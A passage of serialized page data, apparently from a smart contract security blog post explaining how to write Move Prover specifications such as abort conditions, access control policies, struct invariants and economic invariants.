result_22",{"type":27,"tag":207,"props":19464,"children":19465},{"style":226},[19466],{"type":33,"value":229},{"type":27,"tag":207,"props":19468,"children":19469},{"style":1335},[19470],{"type":33,"value":16857},{"type":27,"tag":207,"props":19472,"children":19473},{"style":238},[19474],{"type":33,"value":1343},{"type":27,"tag":207,"props":19476,"children":19477},{"style":220},[19478],{"type":33,"value":10435},{"type":27,"tag":207,"props":19480,"children":19481},{"style":238},[19482],{"type":33,"value":1123},{"type":27,"tag":207,"props":19484,"children":19485},{"style":220},[19486],{"type":33,"value":19487},"result_2",{"type":27,"tag":207,"props":19489,"children":19490},{"style":238},[19491],{"type":33,"value":1455},{"type":27,"tag":207,"props":19493,"children":19494},{"class":209,"line":867},[19495],{"type":27,"tag":207,"props":19496,"children":19497},{"emptyLinePlaceholder":19},[19498],{"type":33,"value":2062},{"type":27,"tag":207,"props":19500,"children":19501},{"class":209,"line":892},[19502,19506,19510,19514,19519,19523,19527,19532,19536,19540,19545],{"type":27,"tag":207,"props":19503,"children":19504},{"style":214},[19505],{"type":33,"value":10290},{"type":27,"tag":207,"props":19507,"children":19508},{"style":220},[19509],{"type":33,"value":15142},{"type":27,"tag":207,"props":19511,"children":19512},{"style":226},[19513],{"type":33,"value":229},{"type":27,"tag":207,"props":19515,"children":19516},{"style":1335},[19517],{"type":33,"value":19518}," compare",{"type":27,"tag":207,"props":19520,"children":19521},{"style":238},[19522],{"type":33,"value":1343},{"type":27,"tag":207,"props":19524,"children":19525},{"style":226},[19526],{"type":33,"value":10398},{"type":27,"tag":207,"props":19528,"children":19529},{"style":220},[19530],{"type":33,"value":19531},"result_11",{"type":27,"tag":207,"props":19533,"children":19534},{"style":238},[19535],{"type":33,"value":1123},{"type":27,"tag":207,"props":19537,"children":19538},{"style":226},[19539],{"type":33,"value":10398},{"type":27,"tag":207,"props":19541,"children":19542},{"style":220},[19543],{"type":33,"value":19544},"result_22",{"type":27,"tag":207,"props":19546,"children":19547},{"style":238},[19548],{"type":33,"value":1455},{"type":27,"tag":207,"props":19550,"children":19551},{"class":209,"line":1475},[19552,19557,19562,19566,19570,19575,19579,19584],{"type":27,"tag":207,"props":19553,"children":19554},{"style":376},[19555],{"type":33,"value":19556}," if",{"type":27,"tag":207,"props":19558,"children":19559},{"style":238},[19560],{"type":33,"value":19561}," ( ",{"type":27,"tag":207,"props":19563,"children":19564},{"style":220},[19565],{"type":33,"value":15207},{"type":27,"tag":207,"props":19567,"children":19568},{"style":226},[19569],{"type":33,"value":10572},{"type":27,"tag":207,"props":19571,"children":19572},{"style":238},[19573],{"type":33,"value":19574}," EQUAL ) ",{"type":27,"tag":207,"props":19576,"children":19577},{"style":214},[19578],{"type":33,"value":11278},{"type":27,"tag":207,"props":19580,"children":19581},{"style":376},[19582],{"type":33,"value":19583}," else",{"type":27,"tag":207,"props":19585,"children":19586},{"style":214},[19587],{"type":33,"value":19588}," false\n",{"type":27,"tag":207,"props":19590,"children":19591},{"class":209,"line":2065},[19592],{"type":27,"tag":207,"props":19593,"children":19594},{"style":238},[19595],{"type":33,"value":451},{"type":27,"tag":36,"props":19597,"children":19598},{},[19599],{"type":33,"value":19600},"Lastly, we want to create a spec block which aborts if the sum overflows, and ensures that the result of the function is true:",{"type":27,"tag":101,"props":19602,"children":19604},{"code":19603,"language":10269,"meta":7,"className":10270,"style":7},"spec add_assoc_property {\n aborts_if (value_of_U256(a) + value_of_U256(b)) + value_of_U256(c) >= P64 * P64 * P64 * P64;\n ensures result == true;\n}\n",[19605],{"type":27,"tag":84,"props":19606,"children":19607},{"__ignoreMap":7},[19608,19623,19727,19751],{"type":27,"tag":207,"props":19609,"children":19610},{"class":209,"line":210},[19611,19615,19619],{"type":27,"tag":207,"props":19612,"children":19613},{"style":220},[19614],{"type":33,"value":15556},{"type":27,"tag":207,"props":19616,"children":19617},{"style":220},[19618],{"type":33,"value":19266},{"type":27,"tag":207,"props":19620,"children":19621},{"style":238},[19622],{"type":33,"value":384},{"type":27,"tag":207,"props":19624,"children":19625},{"class":209,"line":244},[19626,19630,19634,19639,19643,19647,19651,19655,19659,19663,19667,19671,19675,19679,19683,19687,19691,19695,19699,19703,19707,19711,19715,19719,19723],{"type":27,"tag":207,"props":19627,"children":19628},{"style":220},[19629],{"type":33,"value":17179},{"type":27,"tag":207,"props":19631,"children":19632},{"style":238},[19633],{"type":33,"value":686},{"type":27,"tag":207,"props":19635,"children":19636},{"style":1335},[19637],{"type":33,"value":19638},"value_of_U256",{"type":27,"tag":207,"props":19640,"children":19641},{"style":238},[19642],{"type":33,"value":1343},{"type":27,"tag":207,"props":19644,"children":19645},{"style":220},[19646],{"type":33,"value":47},{"type":27,"tag":207,"props":19648,"children":19649},{"style":238},[19650],{"type":33,"value":2222},{"type":27,"tag":207,"props":19652,"children":19653},{"style":226},[19654],{"type":33,"value":2227},{"type":27,"tag":207,"props":19656,"children":19657},{"style":1335},[19658],{"type":33,"value":16980},{"type":27,"tag":207,"props":19660,"children":19661},{"style":238},[19662],{"type":33,"value":1343},{"type":27,"tag":207,"props":19664,"children":19665},{"style":220},[19666],{"type":33,"value":10512},{"type":27,"tag":207,"props":19668,"children":19669},{"style":238},[19670],{"type":33,"value":16117},{"type":27,"tag":207,"props":19672,"children":19673},{"style":226},[19674],{"type":33,"value":2227},{"type":27,"tag":207,"props":19676,"children":19677},{"style":1335},[19678],{"type":33,"value":16980},{"type":27,"tag":207,"props":19680,"children":19681},{"style":238},[19682],{"type":33,"value":1343},{"type":27,"tag":207,"props":19684,"children":19685},{"style":220},[19686],{"type":33,"value":10435},{"type":27,"tag":207,"props":19688,"children":19689},{"style":238},[19690],{"type":33,"value":2222},{"type":27,"tag":207,"props":19692,"children":19693},{"style":226},[19694],{"type":33,"value":17220},{"type":27,"tag":207,"props":19696,"children":19697},{"style":8920},[19698],{"type":33,"value":16936},{"type":27,"tag":207,"props":19700,"children":19701},{"style":226},[19702],{"type":33,"value":17093},{"type":27,"tag":207,"props":19704,"children":19705},{"style":8920},[19706],{"type":33,"value":16936},{"type":27,"tag":207,"props":19708,"children":19709},{"style":226},[19710],{"type":33,"value":17093},{"type":27,"tag":207,"props":19712,"children":19713},{"style":8920},[19714],{"type":33,"value":16936},{"type":27,"tag":207,"props":19716,"children":19717},{"style":226},[19718],{"type":33,"value":17093},{"type":27,"tag":207,"props":19720,"children":19721},{"style":8920},[19722],{"type":33,"value":16936},{"type":27,"tag":207,"props":19724,"children":19725},{"style":238},[19726],{"type":33,"value":241},{"type":27,"tag":207,"props":19728,"children":19729},{"class":209,"line":270},[19730,19734,19738,19742,19747],{"type":27,"tag":207,"props":19731,"children":19732},{"style":220},[19733],{"type":33,"value":17477},{"type":27,"tag":207,"props":19735,"children":19736},{"style":220},[19737],{"type":33,"value":2140},{"type":27,"tag":207,"props":19739,"children":19740},{"style":226},[19741],{"type":33,"value":10572},{"type":27,"tag":207,"props":19743,"children":19744},{"style":214},[19745],{"type":33,"value":19746}," true",{"type":27,"tag":207,"props":19748,"children":19749},{"style":238},[19750],{"type":33,"value":241},{"type":27,"tag":207,"props":19752,"children":19753},{"class":209,"line":296},[19754],{"type":27,"tag":207,"props":19755,"children":19756},{"style":238},[19757],{"type":33,"value":451},{"type":27,"tag":36,"props":19759,"children":19760},{},[19761],{"type":33,"value":19762},"Running move prover with the new specifications, we can confirm that there are no verification errors:",{"type":27,"tag":101,"props":19764,"children":19765},{"code":19223},[19766],{"type":27,"tag":84,"props":19767,"children":19768},{"__ignoreMap":7},[19769],{"type":33,"value":19223},{"type":27,"tag":36,"props":19771,"children":19772},{},[19773,19775,19782],{"type":33,"value":19774},"For a more complete document detailing Move Prover syntax, we recommend referring to ",{"type":27,"tag":47,"props":19776,"children":19779},{"href":19777,"rel":19778},"https://github.com/move-language/move/blob/main/language/move-prover/doc/user/spec-lang.md",[51],[19780],{"type":33,"value":19781},"spec-lang.md",{"type":33,"value":19783}," in the Move Repository.",{"type":27,"tag":28,"props":19785,"children":19787},{"id":19786},"use-cases",[19788],{"type":33,"value":19789},"Use Cases",{"type":27,"tag":36,"props":19791,"children":19792},{},[19793],{"type":33,"value":19794},"Formal verification can prove that a smart contract satisfies the given requirements for all possible cases without even running the contract. The hard part is coming up with the specifications.",{"type":27,"tag":36,"props":19796,"children":19797},{},[19798],{"type":33,"value":19799},"Here, we hope to explore some practical examples of possible verification ideas.",{"type":27,"tag":58,"props":19801,"children":19803},{"id":19802},"error-conditions",[19804],{"type":33,"value":19805},"Error Conditions",{"type":27,"tag":36,"props":19807,"children":19808},{},[19809,19811,19817],{"type":33,"value":19810},"Taking an example from ",{"type":27,"tag":84,"props":19812,"children":19814},{"className":19813},[],[19815],{"type":33,"value":19816},"std::fixed_point32",{"type":33,"value":19818},", it's often useful to explicitly define when a function might abort. For example, arithmetic operations with fixed point numbers should only error if they overflow.",{"type":27,"tag":101,"props":19820,"children":19822},{"code":19821,"language":10269,"meta":7,"className":10270,"style":7}," spec schema MultiplyAbortsIf {\n val: num;\n multiplier: FixedPoint32;\n aborts_if spec_multiply_u64(val, multiplier) > MAX_U64 with EMULTIPLICATION;\n }\n spec fun spec_multiply_u64(val: num, multiplier: FixedPoint32): num {\n (val * multiplier.value) >> 32\n }\n",[19823],{"type":27,"tag":84,"props":19824,"children":19825},{"__ignoreMap":7},[19826,19847,19867,19888,19934,19942,20005,20044],{"type":27,"tag":207,"props":19827,"children":19828},{"class":209,"line":210},[19829,19833,19838,19843],{"type":27,"tag":207,"props":19830,"children":19831},{"style":220},[19832],{"type":33,"value":16208},{"type":27,"tag":207,"props":19834,"children":19835},{"style":220},[19836],{"type":33,"value":19837}," schema",{"type":27,"tag":207,"props":19839,"children":19840},{"style":8920},[19841],{"type":33,"value":19842}," MultiplyAbortsIf",{"type":27,"tag":207,"props":19844,"children":19845},{"style":238},[19846],{"type":33,"value":384},{"type":27,"tag":207,"props":19848,"children":19849},{"class":209,"line":244},[19850,19855,19859,19863],{"type":27,"tag":207,"props":19851,"children":19852},{"style":220},[19853],{"type":33,"value":19854}," val",{"type":27,"tag":207,"props":19856,"children":19857},{"style":226},[19858],{"type":33,"value":736},{"type":27,"tag":207,"props":19860,"children":19861},{"style":220},[19862],{"type":33,"value":17009},{"type":27,"tag":207,"props":19864,"children":19865},{"style":238},[19866],{"type":33,"value":241},{"type":27,"tag":207,"props":19868,"children":19869},{"class":209,"line":270},[19870,19875,19879,19884],{"type":27,"tag":207,"props":19871,"children":19872},{"style":220},[19873],{"type":33,"value":19874}," multiplier",{"type":27,"tag":207,"props":19876,"children":19877},{"style":226},[19878],{"type":33,"value":736},{"type":27,"tag":207,"props":19880,"children":19881},{"style":8920},[19882],{"type":33,"value":19883}," FixedPoint32",{"type":27,"tag":207,"props":19885,"children":19886},{"style":238},[19887],{"type":33,"value":241},{"type":27,"tag":207,"props":19889,"children":19890},{"class":209,"line":296},[19891,19896,19901,19905,19910,19914,19919,19924,19929],{"type":27,"tag":207,"props":19892,"children":19893},{"style":220},[19894],{"type":33,"value":19895}," aborts_if",{"type":27,"tag":207,"props":19897,"children":19898},{"style":1335},[19899],{"type":33,"value":19900}," spec_multiply_u64",{"type":27,"tag":207,"props":19902,"children":19903},{"style":238},[19904],{"type":33,"value":1343},{"type":27,"tag":207,"props":19906,"children":19907},{"style":220},[19908],{"type":33,"value":19909},"val",{"type":27,"tag":207,"props":19911,"children":19912},{"style":238},[19913],{"type":33,"value":1123},{"type":27,"tag":207,"props":19915,"children":19916},{"style":220},[19917],{"type":33,"value":19918},"multiplier",{"type":27,"tag":207,"props":19920,"children":19921},{"style":238},[19922],{"type":33,"value":19923},") > MAX_U64 ",{"type":27,"tag":207,"props":19925,"children":19926},{"style":220},[19927],{"type":33,"value":19928},"with",{"type":27,"tag":207,"props":19930,"children":19931},{"style":238},[19932],{"type":33,"value":19933}," EMULTIPLICATION;\n",{"type":27,"tag":207,"props":19935,"children":19936},{"class":209,"line":445},[19937],{"type":27,"tag":207,"props":19938,"children":19939},{"style":238},[19940],{"type":33,"value":19941}," }\n",{"type":27,"tag":207,"props":19943,"children":19944},{"class":209,"line":867},[19945,19949,19953,19957,19961,19965,19969,19973,19977,19981,19985,19989,19993,19997,20001],{"type":27,"tag":207,"props":19946,"children":19947},{"style":220},[19948],{"type":33,"value":16208},{"type":27,"tag":207,"props":19950,"children":19951},{"style":220},[19952],{"type":33,"value":13489},{"type":27,"tag":207,"props":19954,"children":19955},{"style":1335},[19956],{"type":33,"value":19900},{"type":27,"tag":207,"props":19958,"children":19959},{"style":238},[19960],{"type":33,"value":1343},{"type":27,"tag":207,"props":19962,"children":19963},{"style":220},[19964],{"type":33,"value":19909},{"type":27,"tag":207,"props":19966,"children":19967},{"style":226},[19968],{"type":33,"value":736},{"type":27,"tag":207,"props":19970,"children":19971},{"style":220},[19972],{"type":33,"value":17009},{"type":27,"tag":207,"props":19974,"children":19975},{"style":238},[19976],{"type":33,"value":1123},{"type":27,"tag":207,"props":19978,"children":19979},{"style":220},[19980],{"type":33,"value":19918},{"type":27,"tag":207,"props":19982,"children":19983},{"style":226},[19984],{"type":33,"value":736},{"type":27,"tag":207,"props":19986,"children":19987},{"style":8920},[19988],{"type":33,"value":19883},{"type":27,"tag":207,"props":19990,"children":19991},{"style":238},[19992],{"type":33,"value":10416},{"type":27,"tag":207,"props":19994,"children":19995},{"style":226},[19996],{"type":33,"value":736},{"type":27,"tag":207,"props":19998,"children":19999},{"style":220},[20000],{"type":33,"value":17009},{"type":27,"tag":207,"props":20002,"children":20003},{"style":238},[20004],{"type":33,"value":384},{"type":27,"tag":207,"props":20006,"children":20007},{"class":209,"line":892},[20008,20012,20016,20020,20025,20029,20034,20039],{"type":27,"tag":207,"props":20009,"children":20010},{"style":238},[20011],{"type":33,"value":15991},{"type":27,"tag":207,"props":20013,"children":20014},{"style":220},[20015],{"type":33,"value":19909},{"type":27,"tag":207,"props":20017,"children":20018},{"style":226},[20019],{"type":33,"value":17093},{"type":27,"tag":207,"props":20021,"children":20022},{"style":220},[20023],{"type":33,"value":20024}," multiplier",{"type":27,"tag":207,"props":20026,"children":20027},{"style":226},[20028],{"type":33,"value":1041},{"type":27,"tag":207,"props":20030,"children":20031},{"style":238},[20032],{"type":33,"value":20033},"value) ",{"type":27,"tag":207,"props":20035,"children":20036},{"style":226},[20037],{"type":33,"value":20038},">>",{"type":27,"tag":207,"props":20040,"children":20041},{"style":232},[20042],{"type":33,"value":20043}," 32\n",{"type":27,"tag":207,"props":20045,"children":20046},{"class":209,"line":1475},[20047],{"type":27,"tag":207,"props":20048,"children":20049},{"style":238},[20050],{"type":33,"value":19941},{"type":27,"tag":58,"props":20052,"children":20054},{"id":20053},"access-control-policies",[20055],{"type":33,"value":20056},"Access Control Policies",{"type":27,"tag":36,"props":20058,"children":20059},{},[20060],{"type":33,"value":20061},"Somewhat similar to error conditions, it's often useful to enforce explicit access control policies at the specification level.",{"type":27,"tag":36,"props":20063,"children":20064},{},[20065,20067,20073,20075,20080],{"type":33,"value":20066},"For example, in ",{"type":27,"tag":84,"props":20068,"children":20070},{"className":20069},[],[20071],{"type":33,"value":20072},"std::offer",{"type":33,"value":20074}," we are able to see that the function should abort if and only if there does not exist an offer, ",{"type":27,"tag":942,"props":20076,"children":20077},{},[20078],{"type":33,"value":20079},"or",{"type":33,"value":20081}," the recipient is now allowed.",{"type":27,"tag":101,"props":20083,"children":20085},{"code":20084,"language":10269,"meta":7,"className":10270,"style":7}," spec redeem {\n /// Aborts if there is no offer under `offer_address` or if the account\n /// cannot redeem the offer.\n /// Ensures that the offered struct under `offer_address` is removed.\n aborts_if !exists\u003COffer\u003COffered>>(offer_address);\n aborts_if !is_allowed_recipient\u003COffered>(offer_address, signer::address_of(account));\n ensures !exists\u003COffer\u003COffered>>(offer_address);\n ensures result == old(global\u003COffer\u003COffered>>(offer_address).offered);\n }\n",[20086],{"type":27,"tag":84,"props":20087,"children":20088},{"__ignoreMap":7},[20089,20106,20114,20122,20130,20177,20235,20278,20344],{"type":27,"tag":207,"props":20090,"children":20091},{"class":209,"line":210},[20092,20097,20102],{"type":27,"tag":207,"props":20093,"children":20094},{"style":220},[20095],{"type":33,"value":20096}," spec",{"type":27,"tag":207,"props":20098,"children":20099},{"style":220},[20100],{"type":33,"value":20101}," redeem",{"type":27,"tag":207,"props":20103,"children":20104},{"style":238},[20105],{"type":33,"value":384},{"type":27,"tag":207,"props":20107,"children":20108},{"class":209,"line":244},[20109],{"type":27,"tag":207,"props":20110,"children":20111},{"style":4647},[20112],{"type":33,"value":20113}," /// Aborts if there is no offer under `offer_address` or if the account\n",{"type":27,"tag":207,"props":20115,"children":20116},{"class":209,"line":270},[20117],{"type":27,"tag":207,"props":20118,"children":20119},{"style":4647},[20120],{"type":33,"value":20121}," /// cannot redeem the offer.\n",{"type":27,"tag":207,"props":20123,"children":20124},{"class":209,"line":296},[20125],{"type":27,"tag":207,"props":20126,"children":20127},{"style":4647},[20128],{"type":33,"value":20129}," /// Ensures that the offered struct under `offer_address` is removed.\n",{"type":27,"tag":207,"props":20131,"children":20132},{"class":209,"line":445},[20133,20137,20142,20146,20150,20155,20159,20164,20168,20173],{"type":27,"tag":207,"props":20134,"children":20135},{"style":220},[20136],{"type":33,"value":16332},{"type":27,"tag":207,"props":20138,"children":20139},{"style":226},[20140],{"type":33,"value":20141}," !",{"type":27,"tag":207,"props":20143,"children":20144},{"style":220},[20145],{"type":33,"value":13986},{"type":27,"tag":207,"props":20147,"children":20148},{"style":238},[20149],{"type":33,"value":9257},{"type":27,"tag":207,"props":20151,"children":20152},{"style":8920},[20153],{"type":33,"value":20154},"Offer",{"type":27,"tag":207,"props":20156,"children":20157},{"style":238},[20158],{"type":33,"value":9257},{"type":27,"tag":207,"props":20160,"children":20161},{"style":8920},[20162],{"type":33,"value":20163},"Offered",{"type":27,"tag":207,"props":20165,"children":20166},{"style":238},[20167],{"type":33,"value":14008},{"type":27,"tag":207,"props":20169,"children":20170},{"style":220},[20171],{"type":33,"value":20172},"offer_address",{"type":27,"tag":207,"props":20174,"children":20175},{"style":238},[20176],{"type":33,"value":1455},{"type":27,"tag":207,"props":20178,"children":20179},{"class":209,"line":867},[20180,20184,20188,20193,20197,20201,20205,20209,20214,20218,20222,20226,20231],{"type":27,"tag":207,"props":20181,"children":20182},{"style":220},[20183],{"type":33,"value":16332},{"type":27,"tag":207,"props":20185,"children":20186},{"style":226},[20187],{"type":33,"value":20141},{"type":27,"tag":207,"props":20189,"children":20190},{"style":220},[20191],{"type":33,"value":20192},"is_allowed_recipient",{"type":27,"tag":207,"props":20194,"children":20195},{"style":238},[20196],{"type":33,"value":9257},{"type":27,"tag":207,"props":20198,"children":20199},{"style":8920},[20200],{"type":33,"value":20163},{"type":27,"tag":207,"props":20202,"children":20203},{"style":238},[20204],{"type":33,"value":14893},{"type":27,"tag":207,"props":20206,"children":20207},{"style":220},[20208],{"type":33,"value":20172},{"type":27,"tag":207,"props":20210,"children":20211},{"style":238},[20212],{"type":33,"value":20213},", signer",{"type":27,"tag":207,"props":20215,"children":20216},{"style":226},[20217],{"type":33,"value":10768},{"type":27,"tag":207,"props":20219,"children":20220},{"style":1335},[20221],{"type":33,"value":14491},{"type":27,"tag":207,"props":20223,"children":20224},{"style":238},[20225],{"type":33,"value":1343},{"type":27,"tag":207,"props":20227,"children":20228},{"style":220},[20229],{"type":33,"value":20230},"account",{"type":27,"tag":207,"props":20232,"children":20233},{"style":238},[20234],{"type":33,"value":14505},{"type":27,"tag":207,"props":20236,"children":20237},{"class":209,"line":892},[20238,20242,20246,20250,20254,20258,20262,20266,20270,20274],{"type":27,"tag":207,"props":20239,"children":20240},{"style":220},[20241],{"type":33,"value":15468},{"type":27,"tag":207,"props":20243,"children":20244},{"style":226},[20245],{"type":33,"value":20141},{"type":27,"tag":207,"props":20247,"children":20248},{"style":220},[20249],{"type":33,"value":13986},{"type":27,"tag":207,"props":20251,"children":20252},{"style":238},[20253],{"type":33,"value":9257},{"type":27,"tag":207,"props":20255,"children":20256},{"style":8920},[20257],{"type":33,"value":20154},{"type":27,"tag":207,"props":20259,"children":20260},{"style":238},[20261],{"type":33,"value":9257},{"type":27,"tag":207,"props":20263,"children":20264},{"style":8920},[20265],{"type":33,"value":20163},{"type":27,"tag":207,"props":20267,"children":20268},{"style":238},[20269],{"type":33,"value":14008},{"type":27,"tag":207,"props":20271,"children":20272},{"style":220},[20273],{"type":33,"value":20172},{"type":27,"tag":207,"props":20275,"children":20276},{"style":238},[20277],{"type":33,"value":1455},{"type":27,"tag":207,"props":20279,"children":20280},{"class":209,"line":1475},[20281,20285,20289,20293,20298,20302,20307,20311,20315,20319,20323,20327,20331,20335,20339],{"type":27,"tag":207,"props":20282,"children":20283},{"style":220},[20284],{"type":33,"value":15468},{"type":27,"tag":207,"props":20286,"children":20287},{"style":220},[20288],{"type":33,"value":2140},{"type":27,"tag":207,"props":20290,"children":20291},{"style":226},[20292],{"type":33,"value":10572},{"type":27,"tag":207,"props":20294,"children":20295},{"style":1335},[20296],{"type":33,"value":20297}," old",{"type":27,"tag":207,"props":20299,"children":20300},{"style":238},[20301],{"type":33,"value":1343},{"type":27,"tag":207,"props":20303,"children":20304},{"style":220},[20305],{"type":33,"value":20306},"global",{"type":27,"tag":207,"props":20308,"children":20309},{"style":238},[20310],{"type":33,"value":9257},{"type":27,"tag":207,"props":20312,"children":20313},{"style":8920},[20314],{"type":33,"value":20154},{"type":27,"tag":207,"props":20316,"children":20317},{"style":238},[20318],{"type":33,"value":9257},{"type":27,"tag":207,"props":20320,"children":20321},{"style":8920},[20322],{"type":33,"value":20163},{"type":27,"tag":207,"props":20324,"children":20325},{"style":238},[20326],{"type":33,"value":14008},{"type":27,"tag":207,"props":20328,"children":20329},{"style":220},[20330],{"type":33,"value":20172},{"type":27,"tag":207,"props":20332,"children":20333},{"style":238},[20334],{"type":33,"value":10416},{"type":27,"tag":207,"props":20336,"children":20337},{"style":226},[20338],{"type":33,"value":1041},{"type":27,"tag":207,"props":20340,"children":20341},{"style":238},[20342],{"type":33,"value":20343},"offered);\n",{"type":27,"tag":207,"props":20345,"children":20346},{"class":209,"line":2065},[20347],{"type":27,"tag":207,"props":20348,"children":20349},{"style":238},[20350],{"type":33,"value":10645},{"type":27,"tag":36,"props":20352,"children":20353},{},[20354],{"type":33,"value":20355},"These access control specifications make it impossible to accidentally remove security critical access control policies later.",{"type":27,"tag":58,"props":20357,"children":20359},{"id":20358},"complex-mathematical-formulae",[20360],{"type":33,"value":20361},"Complex Mathematical Formulae",{"type":27,"tag":36,"props":20363,"children":20364},{},[20365,20367,20372],{"type":33,"value":20366},"Whether it's a decimal implementation or more complex data structures, it's often useful to verify that the expected output is ",{"type":27,"tag":942,"props":20368,"children":20369},{},[20370],{"type":33,"value":20371},"always",{"type":33,"value":20373}," the output.",{"type":27,"tag":36,"props":20375,"children":20376},{},[20377],{"type":33,"value":20378},"Proving that your fundamental data structures work exactly as intended will give you much more confidence in the remainder of your codebase.",{"type":27,"tag":36,"props":20380,"children":20381},{},[20382,20384,20391],{"type":33,"value":20383},"For example, in our work with ",{"type":27,"tag":47,"props":20385,"children":20388},{"href":20386,"rel":20387},"https://laminar.markets/",[51],[20389],{"type":33,"value":20390},"Laminar Markets",{"type":33,"value":20392},", we provided recommendations for verifying their internal splay tree implementation against a simpler priority queue data structure.",{"type":27,"tag":58,"props":20394,"children":20396},{"id":20395},"data-invariants",[20397],{"type":33,"value":20398},"Data Invariants",{"type":27,"tag":36,"props":20400,"children":20401},{},[20402,20404,20410,20412,20418,20420,20426,20428,20434],{"type":33,"value":20403},"Formal verification provides the best environment to verify that certain ",{"type":27,"tag":84,"props":20405,"children":20407},{"className":20406},[],[20408],{"type":33,"value":20409},"variables",{"type":33,"value":20411}," or ",{"type":27,"tag":84,"props":20413,"children":20415},{"className":20414},[],[20416],{"type":33,"value":20417},"resources",{"type":33,"value":20419}," don't exceed the intended boundaries. Let's consider the struct from below. We can ensure that ",{"type":27,"tag":84,"props":20421,"children":20423},{"className":20422},[],[20424],{"type":33,"value":20425},"index",{"type":33,"value":20427}," is never greater than 4 using a ",{"type":27,"tag":84,"props":20429,"children":20431},{"className":20430},[],[20432],{"type":33,"value":20433},"struct invariant",{"type":33,"value":1041},{"type":27,"tag":101,"props":20436,"children":20438},{"code":20437,"language":10269,"meta":7,"className":10270,"style":7},"struct Type {\n index: u64\n}\n\nspec Type {\n invariant index \u003C 4;\n}\n",[20439],{"type":27,"tag":84,"props":20440,"children":20441},{"__ignoreMap":7},[20442,20458,20475,20482,20489,20504,20528],{"type":27,"tag":207,"props":20443,"children":20444},{"class":209,"line":210},[20445,20449,20454],{"type":27,"tag":207,"props":20446,"children":20447},{"style":214},[20448],{"type":33,"value":16677},{"type":27,"tag":207,"props":20450,"children":20451},{"style":8920},[20452],{"type":33,"value":20453}," Type",{"type":27,"tag":207,"props":20455,"children":20456},{"style":238},[20457],{"type":33,"value":384},{"type":27,"tag":207,"props":20459,"children":20460},{"class":209,"line":244},[20461,20466,20470],{"type":27,"tag":207,"props":20462,"children":20463},{"style":220},[20464],{"type":33,"value":20465}," index",{"type":27,"tag":207,"props":20467,"children":20468},{"style":226},[20469],{"type":33,"value":736},{"type":27,"tag":207,"props":20471,"children":20472},{"style":8920},[20473],{"type":33,"value":20474}," u64\n",{"type":27,"tag":207,"props":20476,"children":20477},{"class":209,"line":270},[20478],{"type":27,"tag":207,"props":20479,"children":20480},{"style":238},[20481],{"type":33,"value":451},{"type":27,"tag":207,"props":20483,"children":20484},{"class":209,"line":296},[20485],{"type":27,"tag":207,"props":20486,"children":20487},{"emptyLinePlaceholder":19},[20488],{"type":33,"value":2062},{"type":27,"tag":207,"props":20490,"children":20491},{"class":209,"line":445},[20492,20496,20500],{"type":27,"tag":207,"props":20493,"children":20494},{"style":220},[20495],{"type":33,"value":15556},{"type":27,"tag":207,"props":20497,"children":20498},{"style":8920},[20499],{"type":33,"value":20453},{"type":27,"tag":207,"props":20501,"children":20502},{"style":238},[20503],{"type":33,"value":384},{"type":27,"tag":207,"props":20505,"children":20506},{"class":209,"line":867},[20507,20511,20516,20520,20524],{"type":27,"tag":207,"props":20508,"children":20509},{"style":220},[20510],{"type":33,"value":15573},{"type":27,"tag":207,"props":20512,"children":20513},{"style":220},[20514],{"type":33,"value":20515}," index",{"type":27,"tag":207,"props":20517,"children":20518},{"style":226},[20519],{"type":33,"value":4695},{"type":27,"tag":207,"props":20521,"children":20522},{"style":232},[20523],{"type":33,"value":19023},{"type":27,"tag":207,"props":20525,"children":20526},{"style":238},[20527],{"type":33,"value":241},{"type":27,"tag":207,"props":20529,"children":20530},{"class":209,"line":892},[20531],{"type":27,"tag":207,"props":20532,"children":20533},{"style":238},[20534],{"type":33,"value":451},{"type":27,"tag":36,"props":20536,"children":20537},{},[20538,20540,20547,20548,20554],{"type":33,"value":20539},"We were able to verify more complex properties in our recent audits for ",{"type":27,"tag":47,"props":20541,"children":20544},{"href":20542,"rel":20543},"https://layerzero.network/",[51],[20545],{"type":33,"value":20546},"LayerZero",{"type":33,"value":1131},{"type":27,"tag":47,"props":20549,"children":20552},{"href":20550,"rel":20551},"http://ariesmarkets.xyz/",[51],[20553],{"type":33,"value":14072},{"type":33,"value":20555},", but the details are left as an exercise to the reader.",{"type":27,"tag":58,"props":20557,"children":20559},{"id":20558},"economic-invariants",[20560],{"type":33,"value":20561},"Economic Invariants.",{"type":27,"tag":36,"props":20563,"children":20564},{},[20565],{"type":33,"value":20566},"Proper economic invariants can require more creativity to come up with but can be extremely effective at securing your protocol.",{"type":27,"tag":36,"props":20568,"children":20569},{},[20570],{"type":33,"value":20571},"For example, you should never be able to drain coins from a pool by adding and removing shares. In practice, you might implement this as a utility helper function.",{"type":27,"tag":101,"props":20573,"children":20574},{"code":15248,"language":10269,"meta":7,"className":10270,"style":7},[20575],{"type":27,"tag":84,"props":20576,"children":20577},{"__ignoreMap":7},[20578,20585,20668,20707,20726,20733,20748,20771,20794,20817],{"type":27,"tag":207,"props":20579,"children":20580},{"class":209,"line":210},[20581],{"type":27,"tag":207,"props":20582,"children":20583},{"style":4647},[20584],{"type":33,"value":15260},{"type":27,"tag":207,"props":20586,"children":20587},{"class":209,"line":244},[20588,20592,20596,20600,20604,20608,20612,20616,20620,20624,20628,20632,20636,20640,20644,20648,20652,20656,20660,20664],{"type":27,"tag":207,"props":20589,"children":20590},{"style":220},[20591],{"type":33,"value":13851},{"type":27,"tag":207,"props":20593,"children":20594},{"style":1335},[20595],{"type":33,"value":15272},{"type":27,"tag":207,"props":20597,"children":20598},{"style":238},[20599],{"type":33,"value":1343},{"type":27,"tag":207,"props":20601,"children":20602},{"style":220},[20603],{"type":33,"value":15281},{"type":27,"tag":207,"props":20605,"children":20606},{"style":226},[20607],{"type":33,"value":736},{"type":27,"tag":207,"props":20609,"children":20610},{"style":8920},[20611],{"type":33,"value":13142},{"type":27,"tag":207,"props":20613,"children":20614},{"style":238},[20615],{"type":33,"value":1123},{"type":27,"tag":207,"props":20617,"children":20618},{"style":220},[20619],{"type":33,"value":15298},{"type":27,"tag":207,"props":20621,"children":20622},{"style":226},[20623],{"type":33,"value":736},{"type":27,"tag":207,"props":20625,"children":20626},{"style":8920},[20627],{"type":33,"value":13142},{"type":27,"tag":207,"props":20629,"children":20630},{"style":238},[20631],{"type":33,"value":10416},{"type":27,"tag":207,"props":20633,"children":20634},{"style":226},[20635],{"type":33,"value":736},{"type":27,"tag":207,"props":20637,"children":20638},{"style":238},[20639],{"type":33,"value":686},{"type":27,"tag":207,"props":20641,"children":20642},{"style":8920},[20643],{"type":33,"value":15323},{"type":27,"tag":207,"props":20645,"children":20646},{"style":238},[20647]